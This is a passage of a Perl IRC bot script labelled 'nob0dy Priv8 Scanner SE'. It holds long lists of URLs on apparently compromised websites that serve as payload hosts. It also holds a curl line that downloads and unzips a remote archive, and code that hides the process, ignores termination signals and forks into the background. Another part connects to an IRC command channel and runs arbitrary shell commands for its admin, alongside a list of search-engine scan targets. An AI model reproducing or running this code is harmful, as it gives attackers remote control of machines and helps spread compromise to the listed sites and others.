http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  290.  
  291. my @randombarner17  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  292.  
  293. my @randombarner18  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  294.  
  295. my @randombarner19  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  296.  
  297. my @randombarner20  = ("http://www.flowdynamicsinc.com/errors.php","http://www.aramea.co/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://imotionasia.com.vn/errors.php","","http://www.astcl.com/astcl/components/com_mailto/error.php","http://www.vacanzeincampagna.it/components/com_weblinks/views/errors.php","http://turismo.uladech.edu.pe/components/com_mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://w2.portais.atrio.scire.net.br/upe-ppte/components/com_mailto/error.php","http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php","http://www.dzo.ufla.br/pet/components/com_mailto/error.php","http://www.anz.udo.edu.ve/components/com_mailto/error.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.photodesign.uncanny.cz/images/error.php","http://titiprindu.com/errors.php","http://www.solucionesparati.net/CMS2008/images/error.php.1","http://wavevent.fr/administrator/components/com_weblinks/views/errors.php","http://www.rapidsweddings.com/errors.php","http://www.ski-freizeit-reisen.de/components/com_mailto/error.php","http://isanew.grupomathile.com.br/errors.php","http://titiprindu.com/errors.php","http://totalfish.hu/errors.php/errors.php","http://www.picturethismenu.com/errors.php","http://www.rapidsweddings.com/errors.php","http://www.flowdynamicsinc.com/errors.php","http://allindustrialcorp.com/errors.php","http://priorityelectricutility.com/errors.php","http://all-cylinders.com/errors.php","http://snscylinders.com/errors.php","http://www.fcors.com.br/modules/mod_banners/error.php","http://www.bortolotto.eu/plugins/editors/error.php","http://www.flowdynamicsinc.com/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://pictoborden.nl/site/media/mailto/error.php","http://www.bendit.co/backside/media/mailto/error.php","http://www.gambinigroup.it/media/mailto/error.php","http://rothwellscouts.com/media/mailto/error.php","http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php","http://www.infobeton.fr/administrator/components/com_weblinks/views/errors.php","http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php","http://www.pebk.de/joomla/components/com_mailto/error.php","http://upgrade.3t.aprs.la/components/com_mailto/error.php","http://www.theatresprives.com/errors.php","http://www.allcam.org/errors.php","http://www.pastorbonus.sk/errors.php","http://circuitec.com.br/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://www.thewigmall.com/errors.php","http://blahaoffroadteam.hu/errors.php","http://www.geld-verdienen-online.org/errors.php","http://www.cannell-immobilier.com/errors.php","http://www.allcam.org/errors.php","http://blahaoffroadteam.hu/errors.php","http://pliki.modr.mazowsze.pl/media/mailto/error.php","http://totalfish.hu/errors.php/errors.php","http://www.iestpjasdc.edu.pe/contabilidad/components/com_mailto/error.php","http://www.flowdynamicsinc.com/errors.php","http://www.gambinigroup.it/media/mailto/error.php","http://www.pastorbonus.sk/errors.php");
  298.  
  299.  
  300.  
  301.  
  302.  
  303. my $full     = $randombarner[rand(scalar(@randombarner))];
  304.  
  305.  
  306.  
  307. my $full1    = $randombarner[rand(scalar(@randombarner))];
  308.  
  309. my $full2    = $randombarner[rand(scalar(@randombarner))];
  310.  
  311. my $full3    = $randombarner[rand(scalar(@randombarner))];
  312.  
  313. my $full4    = $randombarner[rand(scalar(@randombarner))];
  314.  
  315. my $full5    = $randombarner[rand(scalar(@randombarner))];
  316.  
  317.  
  318.  
  319. my $full6    = $randombarner[rand(scalar(@randombarner))];
  320.  
  321. my $full7    = $randombarner[rand(scalar(@randombarner))];
  322.  
  323. my $full8    = $randombarner[rand(scalar(@randombarner))];
  324.  
  325. my $full9    = $randombarner[rand(scalar(@randombarner))];
  326.  
  327. my $full10   = $randombarner[rand(scalar(@randombarner))];
  328.  
  329.  
  330.  
  331. my $full11   = $randombarner11[rand(scalar(@randombarner11))];
  332.  
  333. my $full12   = $randombarner12[rand(scalar(@randombarner12))];
  334.  
  335. my $full13   = $randombarner13[rand(scalar(@randombarner13))];
  336.  
  337. my $full14   = $randombarner14[rand(scalar(@randombarner14))];
  338.  
  339. my $full15   = $randombarner15[rand(scalar(@randombarner15))];
  340.  
  341.  
  342.  
  343. my $full16   = $randombarner16[rand(scalar(@randombarner16))];
  344.  
  345. my $full17   = $randombarner17[rand(scalar(@randombarner17))];
  346.  
  347. my $full18   = $randombarner18[rand(scalar(@randombarner18))];
  348.  
  349. my $full19   = $randombarner19[rand(scalar(@randombarner19))];
  350.  
  351. my $full20   = $randombarner20[rand(scalar(@randombarner20))];
  352.  
  353.  
  354.  
  355. my $full21   = "http://www.pebk.de/joomla/components/com_mailto/error.php";
  356.  
  357. my $full22   = "http://optim.gim.med.up.pt/components/com_mailto/error.php";
  358.  
  359. my $full23   = "http://www.bendit.co/backside/media/mailto/error.php";
  360.  
  361. my $full24   = "http://www.theatresprives.com/errors.php";
  362.  
  363. my $full25   = "http://www.rpdoarmmgov.ph/redpb/components/com_mailto/error.php";
  364.  
  365.  
  366.  
  367. my $full26   = "http://www.pebk.de/joomla/components/com_mailto/error.php";
  368.  
  369. my $full27   = "http://optim.gim.med.up.pt/components/com_mailto/error.php";
  370.  
  371. my $full28   = "http://www.pebk.de/joomla/components/com_mailto/error.php";
  372.  
  373. my $full29   = "http://pictoborden.nl/site/media/mailto/error.php";
  374.  
  375. my $full30   = "http://blahaoffroadteam.hu/errors.php";
  376.  
  377.  
  378.  
  379.  
  380.  
  381.  
  382.  
  383. my $jack        = "".$full.$pgfa."";
  384.  
  385.  
  386.  
  387. my $jack1       = "".$full1.$pgfa."";
  388.  
  389. my $jack2       = "".$full2.$pgfa."";
  390.  
  391. my $jack3       = "".$full3.$pgfa."";
  392.  
  393. my $jack4       = "".$full4.$pgfa."";
  394.  
  395. my $jack5       = "".$full5.$pgfa."";
  396.  
  397.  
  398.  
  399. my $jack6       = "".$full6.$pgfa."";
  400.  
  401. my $jack7       = "".$full7.$pgfa."";
  402.  
  403. my $jack8       = "".$full8.$pgfa."";
  404.  
  405. my $jack9       = "".$full9.$pgfa."";
  406.  
  407. my $jack10      = "".$full10.$pgfa."";
  408.  
  409.  
  410.  
  411. my $jack11      = "".$full11.$pgfa."";
  412.  
  413. my $jack12      = "".$full12.$pgfa."";
  414.  
  415. my $jack13      = "".$full13.$pgfa."";
  416.  
  417. my $jack14      = "".$full14.$pgfa."";
  418.  
  419. my $jack15      = "".$full15.$pgfa."";
  420.  
  421.  
  422.  
  423. my $jack16      = "".$full16.$pgfa."";
  424.  
  425. my $jack17      = "".$full17.$pgfa."";
  426.  
  427. my $jack18      = "".$full18.$pgfa."";
  428.  
  429. my $jack19      = "".$full19.$pgfa."";
  430.  
  431. my $jack20      = "".$full20.$pgfa."";
  432.  
  433.  
  434.  
  435. my $jack21      = "".$full21.$pgfa."";
  436.  
  437. my $jack22      = "".$full22.$pgfa."";
  438.  
  439. my $jack23      = "".$full23.$pgfa."";
  440.  
  441. my $jack24      = "".$full24.$pgfa."";
  442.  
  443. my $jack25      = "".$full25.$pgfa."";
  444.  
  445.  
  446.  
  447. my $jack26      = "".$full26.$pgfa."";
  448.  
  449. my $jack27      = "".$full27.$pgfa."";
  450.  
  451. my $jack28      = "".$full28.$pgfa."";
  452.  
  453. my $jack29      = "".$full29.$pgfa."";
  454.  
  455. my $jack30      = "".$full30.$pgfa."";
  456.  
  457.  
  458.  
  459. my @gantengs    = (".$jack1.",".$jack2.",".$jack3.",".$jack4.",".$jack5.",".$jack6.",".$jack7.",".$jack8.",".$jack9.",".$jack10.",".$jack11.",".$jack12.");
  460.  
  461. my $best        = $gantengs[rand(scalar(@gantengs))];
  462.  
  463.  
  464.  
  465.  
  466.  
  467.  
  468.  
  469. if (@ARGV == 7) {
  470.  
  471.     print "\n[+] nob0dy Priv8 Scanner SE\n".
  472.  
  473.           "[+] IRC Host    : $ircserver\n".
  474.  
  475.           "[+] IRC Port    : $ircport\n".
  476.  
  477.           "[+] Bot Nick    : $nickname\n".
  478.  
  479.           "[+] Bot Ident   : $ident\n".
  480.  
  481.           "[+] Channel     : $chan\n".
  482.  
  483.           "[+] Bot Admin   : $admin\n".
  484.  
  485.           "[+] Process/PID : $fakeproc - $$\n\n";
  486.  
  487. }
  488.  
  489.  
  490.  
  491. $SIG{'INT'}   = 'IGNORE';
  492.  
  493. $SIG{'HUP'}   = 'IGNORE';
  494.  
  495. $SIG{'TERM'}  = 'IGNORE';
  496.  
  497. $SIG{'CHLD'}  = 'IGNORE';
  498.  
  499. $SIG{'PS'}    = 'IGNORE';
  500.  
  501.  
  502.  
  503. #chdir("/tmp");
  504.  
  505. chop (my $priper = `curl -O http://www.fickbus.de/wp-content/data/cache.zip;unzip -o cache.zip;rm -fr cache.zip`);
  506.  
  507. $ircserver = "$ARGV[0]" if $ARGV[0];
  508.  
  509. $0 = "$fakeproc"."\0" x 16;
  510.  
  511. my $pid = fork;
  512.  
  513. exit if $pid;
  514.  
  515. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  516.  
  517.  
  518.  
  519. our %irc_servers;
  520.  
  521. our %DCC;
  522.  
  523. my $dcc_sel = new IO::Select->new();
  524.  
  525. $sel_client = IO::Select->new();
  526.  
  527.  
  528.  
  529. sub sendraw {
  530.  
  531.     if ($#_ == '1') {
  532.  
  533.     my $socket = $_[0];
  534.  
  535.     print $socket "$_[1]\n";
  536.  
  537.     } else {
  538.  
  539.         print $IRC_cur_socket "$_[0]\n";
  540.  
  541.     }
  542.  
  543. }
  544.  
  545.  
  546.  
  547. sub connector {
  548.  
  549.     my $mynick = $_[0];
  550.  
  551.     my $ircserver_con = $_[1];
  552.  
  553.     my $ircport_con = $_[2];
  554.  
  555.     my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  556.  
  557.     if (defined($IRC_socket)) {
  558.  
  559.         $IRC_cur_socket = $IRC_socket;
  560.  
  561.         $IRC_socket->autoflush(1);
  562.  
  563.         $sel_client->add($IRC_socket);
  564.  
  565.         $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  566.  
  567.         $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  568.  
  569.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  570.  
  571.         $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  572.  
  573.         nick("$mynick");
  574.  
  575.         sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  576.  
  577.         sleep 1;
  578.  
  579.     }
  580.  
  581. }
  582.  
  583.  
  584.  
  585. sub parse {
  586.  
  587.     my $servarg = shift;
  588.  
  589.     if ($servarg =~ /^PING \:(.*)/) {
  590.  
  591.         sendraw("PONG :$1");
  592.  
  593.     }
  594.  
  595.     elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  596.  
  597.         if (lc($1) eq lc($mynick)) {
  598.  
  599.             $mynick = $4;
  600.  
  601.             $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  602.  
  603.         }
  604.  
  605.     }
  606.  
  607.     elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  608.  
  609.         nick("$mynick".int rand(999));
  610.  
  611.     }
  612.  
  613.     elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  614.  
  615.         $mynick = $2;
  616.  
  617.         $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  618.  
  619.         $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  620.  
  621.         sendraw("MODE $mynick +Bxp");
  622.  
  623.         sendraw("NS id aanK1234");
  624.  
  625.         sleep(3);
  626.  
  627.         sendraw("JOIN $chan");
  628.  
  629.         sendraw("JOIN #l l ");
  630.  
  631.         sendraw("PRIVMSG $admin : $admin 9[ 15Let's 4GO9 ]");
  632.  
  633.         sendraw("PRIVMSG $chan :  9[ 15Let's4 GO15 sCan.!9 ]");
  634.  
  635.     }
  636.  
  637. }
  638.  
  639.  
  640.  
  641. my $line_temp;
  642.  
  643. while( 1 ) {
  644.  
  645.     while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
  646.  
  647.     select(undef, undef, undef, 0.01);
  648.  
  649.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  650.  
  651.     my @ready = $sel_client->can_read(0);
  652.  
  653.     next unless(@ready);
  654.  
  655.     foreach $fh (@ready) {
  656.  
  657.         $IRC_cur_socket = $fh;
  658.  
  659.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  660.  
  661.         $nread = sysread($fh, $ircmsg, 4096);
  662.  
  663.         if ($nread == 0) {
  664.  
  665.             $sel_client->remove($fh);
  666.  
  667.             $fh->close;
  668.  
  669.             delete($irc_servers{$fh});
  670.  
  671.         }
  672.  
  673.         @lines = split (/\n/, $ircmsg);
  674.  
  675.         $ircmsg =~ s/\r\n$//;
  676.  
  677.  
  678.  
  679.         if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  680.  
  681.                         my ($nick,$ident,$host,$chan,$msg) = ($1,$2,$3,$4,$5);
  682.  
  683.                         my $engine ="aanK,coi,Prince,kangkung,roin,Keren,Beken,Marlboro,successor,Brewok,Cita-Citata,Depe,JuPe,Ayu-tingting,Siti-badriah,Zaskia-Gotik,Hesty,InuL-darasista,Duo-Racun,Juwita-Bahar,Uut,Tuty-Wibowo,MeLa-Berby,Ria-Amelia,Melinda,Dewinta-Bahar,Lia-Emilia,Ade-Irma,Shinta-n-Jojo,Jenita-Janet,UAE,Myanmar,Argentina,Austria,Australia,Brazil,Canada,Chili,CoMersil,Czech,Germany,Denmark,Spain,Europe,France,Hungary,Indonesia,Israel,India,Info,Iran,Italy,Japan,Korea,Mexico,Malaysia,Network,Netherlands,Organization,Philippines,Polan,Romania,Russian,Thailand,Ukraine,England,USA,Slovenia,Belgium,Bussines,SouthAfrica,Vietnam,Tuvalu,Cocos,Turky,Asia,Serbia,Singapore,Taiwan,Sweden,Pakistan,Norway,Montenegro,Greece,Education,Goverment,Kazakhstan,Afganistan,Albania,Algeria,Angola,Armenia,Azerbaijan,Bahrain,Bangladesh,Belarus,Bhutan,Bolivia,Bosnia,Bulgaria,Brunei,Cambodia,Cameroon,Christmas,CostaRika,Croatia,Cuba,Cyprus,Dominican,Equador,Egypt,Estonia,Finland,Georgia,Ghana,Grenada,Honduras,Hongkong,Iceland,Ireland,Kenya,Kuwait,Laos,Latvia,Liberia,Libyan,Lithuania,Macedonia,Malta,Mongolia,Mozambique,Namibia,Nauru,Nepal,NewZealand,Nigeria,Paraguay,Peru,Portugal,PuertoRico,Qatar,SaintLucia,Samoa,SaudiArabia,Senegal,Slovakia,Srilanka,Swaziland,Tajikistan,Tanzania,Tokelau,Tonga,Tunisia,Uruguay,Uzbekistan,Venezuela,Yemen,Yugoslavia,Zambia,Uganda,Trinidad,Zimbabwe,KonToL,PePek,TeTek,ItiL,Vagina,NenNen,SuSu,BuahDada,PayuDara,Kentot,eMeL,OraL,Klitoris,Masturbasi,Onani,Sperma,AnaL,Puting,Penis,MeMek,GooGLeCA,GooGLeDE,GooGLeUK,GooGLeFR,GooGLeES,GooGLeIT,GooGLeNL,GooGLeBE,GooGLeCH,GooGLeSE,GooGLeDK,GooGLeNO,GooGLeNZ,GooGLeIE,GooGLeBR,GooGLeAR,GooGLeCO,GooGLeCU,GooGLeCL,GooGLeMX,GooGLeAU,GooGLeRU,GooGLeAT,GooGLePL,GooGLeIL,GooGLeTR,GooGLeUA,GooGLeGR,GooGLeJP,GooGLeCN,GooGLeMY,GooGLeTH,GooGLeIN,GooGLeKR,GooGLeRO,GooGLeTW,GooGLeZA,GooGLePT,BingDE,BingUK,BingCA,BingBR,BingFR,BingES,BingIT,BingBE,BingNL,BingPT,BingNO,BingDK,BingSE,BingCH,BingNZ,BingRU,BingJP,BingCN,BingKR,BingMX,BingAR,BingCL,BingAU,AsKCA,AsKDE,AsKIT,AsKFR,AsKES,AsKRU,AsKNL,AsKUK,AsKBR,AsKPL,AsKAU,AsKAT,AsKJP,AsKSE,AsKMX,AsKNO,AsKDK";
  684.  
  685.             if ($chan eq $mynick) {
  686.  
  687.            
  688.  
  689.                 if ($msg =~ /^PING (.*)/) {
  690.  
  691.                     sendraw("NOTICE $nick :PING $1");
  692.  
  693.                 }
  694.  
  695.                 if ($msg =~ /^VERSION/) {
  696.  
  697.                     sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");
  698.  
  699.                 }
  700.  
  701.                 if ($msg =~ /^TIME/) {
  702.  
  703.                     sendraw("NOTICE $nick :TIME ".$datetime."");
  704.  
  705.                 }
  706.  
  707.                 if (&isAdmin($nick) && $msg eq "!die") { &shell("$chan","kill -9 $$"); }
  708.  
  709.                 if (&isAdmin($nick) && $msg eq "!killall") {&shell("$chan","killall -9 perl");}
  710.  
  711.                 if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting...");}
  712.  
  713.                 if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); }
  714.  
  715.                 if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); }
  716.  
  717.                 if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1);}
  718.  
  719.                 if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); }
  720.  
  721.                 if (&isAdmin($nick) && $msg !~ /^!/) {&shell("$nick","$msg"); }
  722.  
  723.                 }
  724.  
  725.                 else {
  726.  
  727.                 if (&isAdmin($nick) && $msg eq "!die") {&shell("$chan","kill -9 $$"); }
  728.  
  729.                 if (&isAdmin($nick) && $msg eq "!killall") {&shell("$chan","killall -9 perl");}
  730.  
  731.                 if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting...");}
  732.  
  733.                 if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1);}
  734.  
  735.                 if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $chan");}
  736.  
  737.                 if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1);}
  738.  
  739.                 if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {&shell("$chan","$1"); }
  740.  
  741.                 if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {&shell("$chan","$1");}
  742.  
  743.                 if (&isAdmin($nick) && $msg =~ /^!addadmin\ (.+) /) {
  744.  
  745.                
  746.  
  747.                 if (my $pid = fork) {
  748.  
  749.                         waitpid($pid, 0); } else {
  750.  
  751.                                 if (fork) { exit; }
  752.  
  753.                             else {
  754.  
  755.                                 $newadmin = $1;
  756.  
  757.                                     $admin = $newadmin;
  758.  
  759.                             &msg("$chan","12 Admin added to4 $admin ");
  760.  
  761.                 }}}
  762.  
  763.                 ##################################################################### HELP COMMAND
  764.  
  765.  
  766.  
  767.                 if ($msg=~ /^!help/) {
  768.  
  769.                     my $helplogo = "9[ 15He4Lp9 ]";
  770.  
  771.                         $inject = "";
  772.  
  773.                   if (-e ($update_file)){ $inject = "3Ready!!!"; } else { $inject = "4Lost!!!"; }
  774.  
  775.                  
  776.  
